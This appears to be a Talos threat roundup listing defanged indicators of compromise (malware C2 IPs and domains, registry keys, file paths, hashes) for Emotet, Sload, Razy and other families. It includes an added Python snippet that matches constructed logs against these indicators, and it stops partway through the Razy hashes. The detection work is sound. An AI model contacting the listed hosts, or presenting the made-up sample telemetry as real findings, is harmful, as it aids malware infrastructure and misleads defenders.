Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 25 and Oct. 2. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, it summarizes the threats we've observed by highlighting key behavioral characteristics and indicators of compromise, and discusses how our customers are automatically protected from these threats.
As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. Additionally, please keep in mind that IOC searching is only one part of threat hunting: spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.
For each threat described below, this blog post lists only 25 of the associated file hashes and up to 25 IOCs for each category. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of a technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. Five distinct shades are used, with the darkest indicating that no files exhibited the technique and the brightest indicating that the technique was observed in 75 percent or more of the files.
The most prevalent threats highlighted in this roundup are:
Threat Name / Type / Description

Doc.Malware.Emotet-9766089-0 (Malware)
Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.

Doc.Malware.Sload-9765483-0 (Malware)
The Sload downloader launches PowerShell and gathers information about the infected system. The PowerShell script may download the final payload or another downloader.

Doc.Malware.Sagent-9765485-0 (Malware)
Sagent downloads and executes a binary using PowerShell launched from a Microsoft Word document.

Doc.Dropper.Valyria-9768469-0 (Dropper)
Valyria is a malicious Microsoft Word document family that is used to distribute other malware, such as Emotet.

Win.Malware.Barys-9768982-0 (Malware)
Barys is a trojan and downloader that allows malicious actors to upload files to a victim's computer.

Win.Packed.Razy-9768972-0 (Packed)
Razy is often a generic detection name for a Windows trojan. It collects sensitive information from the infected host, encrypts the data, and sends it to a command and control (C2) server. The information collected might include screenshots. The samples establish persistence by creating a registry value that causes the malware to run automatically.

Win.Trojan.Bifrost-9768974-0 (Trojan)
Bifrost is a backdoor with more than 10 variants. Bifrost uses the typical server, server builder, and client backdoor program configuration to allow a remote attacker to execute arbitrary code on the compromised machine. Bifrost contains standard RAT features including a file manager, screen capture utility, keylogging, video recording, microphone and camera monitoring, and a process manager. Bifrost uses a mutex that may be named "Bif1234" or "Tr0gBot" to mark its presence on the system.

Win.Trojan.Zbot-9769359-0 (Trojan)
Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods like keylogging and form-grabbing.

Win.Packed.Dridex-9768984-0 (Packed)
Dridex is a well-known banking trojan that aims to steal credentials and other sensitive information from an infected machine.
Threat Breakdown
Doc.Malware.Emotet-9766089-0
Indicators of Compromise
IOCs collected from dynamic analysis of 68 samples
Registry Keys (Occurrences)
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
14
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
13
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
13
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT
3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\DEFAULTICON
3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\OPEN\COMMAND
3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINT\COMMAND
3
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINTTO\COMMAND
3
<HKCU>\SOFTWARE\JOSEFSSON
2
<HKCU>\SOFTWARE\JOSEFSSON\DIALUPWATCH
2
<HKCU>\SOFTWARE\JOSEFSSON\DIALUPWATCH\RECENT FILE LIST
2
<HKCU>\SOFTWARE\JOSEFSSON\DIALUPWATCH\SETTINGS
2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL
2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\OPEN
2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINT
2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT\SHELL\PRINTTO
2
<HKLM>\SOFTWARE\CLASSES\DIALUPWATCH.DOCUMENT
2
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBDBE
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RADARDT
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\DOT3GPCLNT
Value Name: ImagePath
1
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
62[.]234[.]99[.]30
68
174[.]113[.]69[.]136
42
51[.]38[.]124[.]206
29
91[.]105[.]94[.]200
11
155[.]186[.]0[.]121
9
208[.]100[.]26[.]245
1
172[.]67[.]176[.]226
1
172[.]67[.]139[.]128
1
104[.]18[.]54[.]117
1
157[.]245[.]178[.]49
1
Domain Names contacted by malware; does not indicate maliciousness (Occurrences)
boys86[.]com
68
e13678[.]dspb[.]akamaiedge[.]net
15
www[.]cloudflare[.]com
1
fepami[.]com
1
dacyclin[.]com
1
www[.]business-management-degree[.]net
1
xnxxfullhd[.]com
1
Files and/or directories created (Occurrences)
%HOMEPATH%\FY6iR_w
68
%HOMEPATH%\FY6iR_w\bD8J_41
68
%HOMEPATH%\Fy6ir_w\Bd8j_41\E0c6vgg.exe
68
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>
16
%TEMP%\<random, matching '[a-z]{3}[A-F0-9]{3,4}'>.tmp
5
%SystemRoot%\SysWOW64\NlsLexicons0046
2
%System32%\user32\tapisrv.exe (copy)
2
%System32%\spp\store\2.0\data.dat.tmp
1
%System32%\uudf\msiwer.exe (copy)
1
%System32%\Windows.Gaming.Preview\tzres.exe (copy)
1
%System32%\mcupdate_GenuineIntel\poqexec.exe (copy)
1
File Hashes
0132a53946f8fd63dd5709b4ecb5004ea11fc2beaec94ef5e017453c0142f905
082b657e6fc18dd578b33ff31b260c6951ccebcb4cd71e19852a609ca723a27b
0849d06487556039dd4ce57a9338b26c767fda17fbbb5e5876fd1090295ced11
0bb2936e529012cf02cb1f7609fa7287b49bd3a5130689aa0fbea224394e208b
0bf1382d9493a03c8b56f2befa1ada29ce2ac87dbde3a1c02a0742a95e630a5c
12c96f80fe4fb65075234dbad10058e7efbe9f07774d8ca20219f5b5fd0b7c00
1312e631f80e724ea637d1b035eb3342f09a32208ab559bc85cd5820956a5755
14b8acf04483277af0342148ad78291ceb2393d22002c123a588e6b76c9c9d3d
17395a5b140f7d5690341de536c715c0258e71236e00c46aef0913301419aa57
195497c9eef9d1ebcd88ff1072c76da4a9e2ec082f586c01c493d28f70c386ec
1a6ee7bebb2357d095b418809d640b0d6f806698e8657de50cd48c93f0e92d74
1ac42c93a5c7ed2032a573c91d229836148d58174b546d68fad1283466142b01
1f51bcef87e327d29ffad24ec36cb016442f41bc9d06989b527e05c0b79550df
219b5d039e4a109011e021799762a7dddecbc2c5e6f75294daac8bb6454790a5
2df2c1608e75dc3162882ed50ee37c43d174deb4d1ce6fc85fc1386efb6a1b71
2e5cf7a36eba949a076059c64011466d48fabd37a7ea5a23bddf0f63de7e7952
3345219199def661640c5182b7491c413702216149790bcddd8d884e9bcd112e
369580713eae08e2f56eb5350eebcc9e3fb28e1f88abf5b18b726fb6ac50d843
370530ab4dc609acab76596c874f60ec5b1969fe7db26584a036286572a7e0a4
374479a115841ea03babcd76b6245d0123aa969af8f5eeb27277397ce574562a
37ab1a64ee62c8f9b5d4241f788ac2ca6bfe3239460f411f848b7b1baf187976
4142cb49199a7efe52b944caff9ab5b07d61438a9fc89a413199b2f801aec9d8
41a035835264e22d0533d34539e7ae0db8573b8b7bb013a5ad3fddfc6965884c
43be6d6834d6347397c37b76980ba172a1bf750ee9c89cbf6c125df91e916d47
45af7091348e94523fcf93e8b5a0b895bfb10b778f2af8e04996845c8ee1e1d5
*See JSON for more IOCs
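As an added example (not part of the Talos post or its JSON), the Python below shows how a hunter would actually use the Emotet tables above: it refangs the post's `[.]` notation, matches constructed DNS and flow records against the listed C2 IPs and domains, keeps the shared CDN names (akamaiedge, cloudflare) as context rather than alerts, and flags a service only when its name matches the post's `[A-Z0-9]{8}` pattern and its ImagePath points at a `SysWOW64\<[a-z]{8}>` binary, since either pattern on its own matches plenty of legitimate entries. All telemetry, host names and service entries are constructed for the example.

```python
import re

def refang(ioc: str) -> str:
    """Convert the post's defanged notation (62[.]234[.]99[.]30) back to a live indicator."""
    return ioc.replace("[.]", ".")

# Indicators copied from the Emotet tables above, still defanged.
EMOTET_IPS = {"62[.]234[.]99[.]30", "174[.]113[.]69[.]136", "51[.]38[.]124[.]206",
              "91[.]105[.]94[.]200", "155[.]186[.]0[.]121"}
EMOTET_DOMAINS = {"boys86[.]com", "fepami[.]com", "dacyclin[.]com"}
# Shared CDN names the post also lists; a hit here is context, not an alert on its own.
SHARED_DOMAINS = {"e13678[.]dspb[.]akamaiedge[.]net", "www[.]cloudflare[.]com"}

LIVE_IPS = {refang(i) for i in EMOTET_IPS}
LIVE_DOMAINS = {refang(d) for d in EMOTET_DOMAINS}
LIVE_SHARED = {refang(d) for d in SHARED_DOMAINS}

# Constructed sample telemetry (not from the post).
DNS_LOG = [
    "2020-09-30T10:01:02Z ws07 query=boys86.com type=A",
    "2020-09-30T10:01:03Z ws07 query=www.cloudflare.com type=A",
    "2020-09-30T10:02:11Z ws12 query=mail.example.org type=MX",
    "2020-09-30T10:05:44Z ws12 query=fepami.com. type=A",
]
FLOWS = [  # (src, dst, dst port)
    ("10.0.0.7", "62.234.99.30", 443),
    ("10.0.0.7", "93.184.216.34", 443),
    ("10.0.0.12", "51.38.124.206", 8080),
]
SERVICES = [  # (service key name, ImagePath) as read from HKLM\SYSTEM\...\Services
    ("Schedule", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("Q7XK2M9P", r"C:\Windows\SysWOW64\qwertyui"),
    ("KBDBE", r"C:\Windows\SysWOW64\kbdbe.dll"),
    ("A1B2C3D4", r"C:\Windows\SysWOW64\Updater.exe"),
]

def match_dns(lines):
    """Return (host, queried name, category) for queries hitting the Emotet or shared-infra lists."""
    hits = []
    for line in lines:
        m = re.search(r"query=(\S+)", line)
        if not m:
            continue
        host = line.split()[1]
        name = m.group(1).lower().rstrip(".")   # normalise trailing dot and case
        if name in LIVE_DOMAINS:
            hits.append((host, name, "emotet-domain"))
        elif name in LIVE_SHARED:
            hits.append((host, name, "shared-infra"))
    return hits

def match_flows(flows):
    """Return flows whose destination is one of the listed Emotet C2 addresses."""
    return [f for f in flows if f[1] in LIVE_IPS]

RANDOM_SERVICE_NAME = re.compile(r"[A-Z0-9]{8}")        # pattern from the registry table above
RANDOM_SYSWOW64_FILE = re.compile(r"[a-z]{8}(\.exe)?")  # pattern from the files table above

def suspicious_services(services):
    """Flag services that combine the random-name pattern with a random SysWOW64 ImagePath.
    Either pattern alone matches legitimate entries, so both are required."""
    out = []
    for name, image_path in services:
        directory, _, base = image_path.rpartition("\\")
        if (RANDOM_SERVICE_NAME.fullmatch(name)
                and directory.lower().endswith("\\syswow64")
                and RANDOM_SYSWOW64_FILE.fullmatch(base)):
            out.append(name)
    return out

if __name__ == "__main__":
    print(match_dns(DNS_LOG))
    print(match_flows(FLOWS))
    print(suspicious_services(SERVICES))
```

The same approach extends to the other threats in this post: load the JSON, refang each list once, and treat the "does not indicate maliciousness" network lists as enrichment that needs a second signal (a file or registry artifact) before it becomes an alert.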
Coverage
Protected by: AMP, CWS, Email Security, Network Security, Threat Grid, Umbrella, WSA
Not applicable: Cloudlock, Stealthwatch, Stealthwatch Cloud
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Doc.Malware.Sload-9765483-0
Indicators of Compromise
IOCs collected from dynamic analysis of 35 samples
Mutexes (Occurrences)
Global\MsoShellExtRegAccess_S-1-5-21-2580483871-590521980-3826313501-500
35
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
217[.]144[.]104[.]39
35
103[.]214[.]167[.]114
35
51[.]254[.]205[.]84
35
2[.]59[.]117[.]6
35
139[.]162[.]210[.]105
35
103[.]130[.]219[.]49
35
67[.]199[.]248[.]10/31
31
51[.]77[.]231[.]185
2
Domain Names contacted by malware; does not indicate maliciousness (Occurrences)
www[.]litespeedtech[.]com
35
api[.]w[.]org
35
gmpg[.]org
35
t[.]me
35
www[.]xinwenlook[.]com
35
kpisolutions[.]net
35
fgyapim[.]com
35
atomic-soft[.]com
35
auto-boot-like[.]com
35
salamatbanoo[.]ir
35
bit[.]ly
31
aragrp[.]com
24
schema[.]org
6
e13678[.]dspb[.]akamaiedge[.]net
6
mysterythemes[.]com
6
demo[.]mysterythemes[.]com
6
www[.]aparat[.]com
4
data-vocabulary[.]org
1
image[.]rakuten[.]co[.]jp
1
www[.]shonanbbq[.]jp
1
thumbnail[.]image[.]rakuten[.]co[.]jp
1
shop[.]r10s[.]jp
1
www[.]rtl-theme[.]com
1
Files and/or directories created (Occurrences)
\Kiloperit\Loterios.exe
35
\Kiloperit
35
\Kiloperit\Groters.cmd
35
%ProgramData%\Helpot.vbs
35
%ProgramData%\Kolester.vbs
35
File Hashes
03c9fc78d2a6a7b6682111d70fd47483dbcce7b5b2b7395d9cb5e6bc53853b41
049fafbcead9f25231523454a2e9a0f6f53c1a994574d790725b5f7fdf9ad303
068e4de9a05da6cd60cea869b60a1b35b074d2d1209825ac8503ab0aff03e6a4
08f1e023603c5bbded2234f3da049ee5099d6acb02bd67f316755d3b5f05d8f5
0b74d64a1aa19b4cbf85eb94621ef62ea2a32d0b6fe7879f367e9b8de0816430
0e36f81f0332a4b6bca8e807abb020fe654be9a3e9022aed3ea071f888e97fdf
0f724265d9d4e4ffc4581971c97888235f8593435ff8c608e3cc53397bb5431d
0fdfa93636214d614b2b094d8a03de06abc0364ff5a4abfcbd0d9aa4f826521e
0ff59a32b7bb2a427995b7ada58410acd2aaf9a5a2a1b430300bb47bc678a269
1169a93ffa8c8a5b0a59f9c40b87fb10aca1400afabc34c8319a23b94e327312
16373f1b4582fefb527d420af700d11aabea5f8d04d4481a03253d698b5ed94f
182cedbb86f96a286d1f96d07a4aae0657e00759e68f35ac9b676e7a176d6dbf
1fdae763089dbe2e5e7083aa069b7cecb329d1e894cf443f11fa87b3cbe72919
20a600f4b85f601331e413e77e01def30375b5d12e8da0e283492fbf21603244
221aa40298b5256a2b79a0ba852c44f4f23e140461741ea73d686965e38a1361
258b991f4469d86316d73570a60c90ab04e5a4acd04c5685f9008df04a1c07df
26006a31ba4d51e415e005679b9ea5ea774d0e514668d0f77b53eafc60233bec
284db9216a0a55d8a72701e87aaea55eee5ac946dad7b37448f4eeb50e178989
2d140448346ac6b67b82091edceb992173989430b8b85fd55568a93e4092a625
2de306c8ff840bf87140f7774c0ed7c6dcbd4ada5db466311d8b9646d121afe0
34155568221422e29e5dc298e3e3be175f011b1e3412d32aba1676bfa3d5f995
3a2a758659051bb3a626c13d9eab2397d140de4b637a3e950e710d53a31fb017
3b6a9c380922f886ae04d45f888415278f0a5c7f7915f7f10f119ce042dc605c
3e90ed6a177d0200853ef7cffd29d202309a8b2d1d2006b7e3b89aa1a28de58e
3eca4c3c9bc710f41c2f8d947aba877de39f5c887e4b1d1d29950a729216472c
*See JSON for more IOCs
Coverage
Protected by: AMP, CWS, Email Security, Network Security, Threat Grid, Umbrella, WSA
Not applicable: Cloudlock, Stealthwatch, Stealthwatch Cloud
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Doc.Malware.Sagent-9765485-0
Indicators of Compromise
IOCs collected from dynamic analysis of 23 samples
Registry Keys (Occurrences)
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\CRYPTOGRAPHY\AUTOENROLLMENT
23
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INSTALLER\USERDATA\S-1-5-18\PRODUCTS\00004119110000000000000000F01FEC
Value Name: VBAFiles
3
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
13[.]32[.]202[.]80
1
Domain Names contacted by malware; does not indicate maliciousness (Occurrences)
fantasticvilla[.]xyz
23
e13678[.]dspb[.]akamaiedge[.]net
10
Files and/or directories created (Occurrences)
%HOMEPATH%\N5uIJVSp.dll
23
%APPDATA%\PC
23
%HOMEPATH%\N5uIJVSp.doc (copy)
23
%SystemRoot%\cer<random, matching '[A-F0-9]{3,4}'>.tmp
23
File Hashes
069e5be54a90423032dfb6d1427e79a9b0381b4ffd062b654a7cdf9764b89bc7
*See JSON for more IOCs
Coverage
Protected by: AMP, CWS, Email Security, Threat Grid, Umbrella, WSA
Not applicable: Cloudlock, Network Security, Stealthwatch, Stealthwatch Cloud
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Doc.Dropper.Valyria-9768469-0
Indicators of Compromise
IOCs collected from dynamic analysis of 25 samples
Registry Keys (Occurrences)
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION\PARAMETERS
Value Name: TrapPollTimeMilliSecs
2
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\68\COMDLG
Value Name: TV_FolderType
2
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\68\COMDLG
Value Name: TV_TopViewID
2
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\68\COMDLG
Value Name: TV_TopViewVersion
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION
2
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\RFC1156AGENT\CURRENTVERSION\PARAMETERS
2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD
2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD\SETTINGS
2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD\SETTINGS\SAVE AS
2
<HKCU>\SOFTWARE\MICROSOFT\OFFICE\14.0\COMMON\OPEN FIND\MICROSOFT WORD\SETTINGS\SAVE AS
Value Name: ClientGUID
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\COMDLG32\CIDSIZEMRU
Value Name: 6
2
Mutexes (Occurrences)
Local\SHResolveLibrary:C:/Users/Administrator/AppData/Roaming/Microsoft/Windows/Libraries/Documents.library-ms
2
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
212[.]13[.]197[.]229
18
198[.]54[.]126[.]167
9
162[.]241[.]253[.]225
7
72[.]21[.]81[.]240
6
173[.]231[.]210[.]20
2
204[.]79[.]197[.]200
1
23[.]3[.]13[.]154
1
8[.]253[.]131[.]111
1
8[.]248[.]159[.]254
1
8[.]253[.]45[.]248
1
8[.]249[.]221[.]254
1
Domain Names contacted by malware; does not indicate maliciousness (Occurrences)
chiark[.]greenend[.]org[.]uk
18
1[.]0[.]168[.]192[.]in-addr[.]arpa
14
ctldl[.]windowsupdate[.]com
11
e13678[.]dspb[.]akamaiedge[.]net
9
secure[.]zenithglobalplc[.]com
9
lxj[.]vvn[.]mybluehost[.]me
7
cs11[.]wpc[.]v0cdn[.]net
6
auto[.]au[.]download[.]windowsupdate[.]com[.]c[.]footprint[.]net
4
229[.]197[.]13[.]212[.]in-addr[.]arpa
2
aonefire[.]com
2
a767[.]dscg3[.]akamai[.]net
1
Files and/or directories created (Occurrences)
\MyImages\presskey.cmd
18
\MyImages\presskey.jse4
18
\MyImages\presskey.jse5
18
\MyImages\presskey2.cmd
18
\MyImages\tlofgkkjl15g5k.vbs
18
\MyImages\presskey.jse
11
\MyImages\presskey.jse1
7
File Hashes
0763afbc2854ad1a778ce74d34384d70ea4f9700108529434579e2452e7616e8
*See JSON for more IOCs
Coverage
Protected by: AMP, CWS, Email Security, Network Security, Threat Grid, Umbrella, WSA
Not applicable: Cloudlock, Stealthwatch, Stealthwatch Cloud
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Win.Malware.Barys-9768982-0
Indicators of Compromise
IOCs collected from dynamic analysis of 25 samples
Registry Keys (Occurrences)
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{<random GUID>}
25
<HKLM>\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{<random GUID>}
Value Name: stubpath
25
IP Addresses contacted by malware; does not indicate maliciousness (Occurrences)
174[.]139[.]60[.]11
24
Domain Names contacted by malware; does not indicate maliciousness (Occurrences)
dontkillme
25
gameover
25
www[.]spod[.]co[.]kr
25
list[.]bestxss[.]com
25
Files and/or directories created (Occurrences)
%SystemRoot%\SysWOW64\vcapi.exe
25
%System32%\vcapi.exe
24
File Hashes
00256bcc35c0c7004acc53e0a4ad53c98125eecfebb4617037a510e316053e3f
*See JSON for more IOCs
Coverage
Protected by: AMP, CWS, Email Security, Threat Grid
Not applicable: Cloudlock, Network Security, Stealthwatch, Stealthwatch Cloud, Umbrella, WSA
Screenshots of Detection
[AMP and ThreatGrid detection screenshots not reproduced]
MITRE ATT&CK
[technique map image not reproduced]
Win.Packed.Razy-9768972-0
Indicators of Compromise
IOCs collected from dynamic analysis of 19 samples
Registry Keys (Occurrences)
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{690D1BD7-EA98-1004-3AC9-E87553700E95}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63FC4996-AFD5-E391-06A7-EFB6E2702561}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10CDDA71-B745-777B-1AF7-51696DB9BB93}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{CFD6D5E6-02FB-7433-9261-E8E1B87CAC69}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{8BAB5812-9D02-8F14-74B1-BEDE393F8C1F}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{10DF83AD-199B-9C18-3FEF-E4ECD6A42F66}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{1AD90FE5-CE2F-E8B8-CF09-E0B1912E9542}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{05ED06D6-F422-71CC-26B3-C9964D56F645}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{98B09642-2764-54AE-3333-D8C6CA536428}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{63D99860-AA40-CA79-F681-9DECBEF55447}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{D4B277A3-C25E-BCDE-A054-D41AAC36394B}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{FE9DE6BC-A4CF-8285-E73C-DFE7A08197FE}\SHELLFOLDER
19
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\CLSID\{B11CF2E2-C0C2-7860-F12E-428101DCB963}
19
Mutexes (Occurrences)
{24d07012-9955-711c-e323-1079ebcbe1f4}
19
{fa55c581-7c66-eeeb-7446-e85cdd6e7a03}
19
{1cd1f8a6-f7bb-04d1-d80f-2a4c87e86995}
19
{c52654a1-56b4-1379-a079-9399d3529237}
19
{c6f7747b-6c04-5b4b-1038-fdf3a4b114de}
19
Files and/or directories created (Occurrences)
%System32%\Tasks\Ryddmbivo
19
%APPDATA%\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\euSMS
2
%APPDATA%\Microsoft\Templates\SmartArt Graphics\wRswLnE5
1
%APPDATA%\Microsoft\SystemCertificates\My\CRLs\BrHHj
1
%APPDATA%\Microsoft\SystemCertificates\My\CTLs\POIunUpDiiw
1
%APPDATA%\Microsoft\UProof\K9US2
1
%APPDATA%\Microsoft\Crypto\RSA\S-1-5-21-2580483871-590521980-3826313501-500\2h1C
1
%APPDATA%\Microsoft\Templates\LiveContent\User\PReu8Y
1
%APPDATA%\Microsoft\Templates\LiveContent\Managed\SmartArt Graphics\1033\bdM4bZq
1
%APPDATA%\Microsoft\Windows\Start Menu\kyqlqe3
1
%APPDATA%\Microsoft\Protect\TVr6Axdt4
1
%APPDATA%\Microsoft\Document Building Blocks\1033\pQy
1
%APPDATA%\Microsoft\SystemCertificates\My\CRLs\yhNSoDV
1
%APPDATA%\Microsoft\Templates\LiveContent\Managed\Document Themes\qt8iBbvaD9N
1
%APPDATA%\Microsoft\Excel\xNClDeKvGX
1
%APPDATA%\Microsoft\Templates\LiveContent\User\Word Document Building Blocks\1033\1zucyY69
1
%APPDATA%\Macromedia\Flash Player\macromedia.com\ndVnWH
1
%APPDATA%\Microsoft\Windows\Network Shortcuts\8JBThBOf
1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\W7vvpql
1
File Hashes
01ff8188c74308b5694f1f5417b8dc8a2c5ac2fe59b4b10d792273dfd00c40d9
230d68f04b62e617e40c56976ab583c7eeaa20761a36424ff587f62411770bbd
23c5bbe598a60c2814cd72779bc50626d16455ec1197c73f33bfcb8b9bd95bee
3a5d69c3a2b52ad6d2eb5c1471ca4e93fbb17cae1bc33972a67c2aedda09581f
3d91e0a34af694a2c0dcecbf51e9aea69df32acfafa28e778f8136585c188a9b
43edfba88ac4ef39ede058afdd0640c659e3cf939a920c7f45449bf514ecd9cf
4dcf29b7d5c46b1647550492fea89934c0279562875c1c1f5d2a32eadddfef2f
532c4a9fdcc00ccbbde0658accc2d5d76862011038a28136e5c19f312e1cd7a9
6354ac921d32035dcdf9ade95aa7025c517d47e93b1d636b415944ff4de87896
66b88b6a6bbc1178cd69d4730d4e946ac78fd7b7941a7752c269e5526475a48f
7027504d9be13bd47b45742a2035263c69ca96596e19db73d27e0b91bb48086a
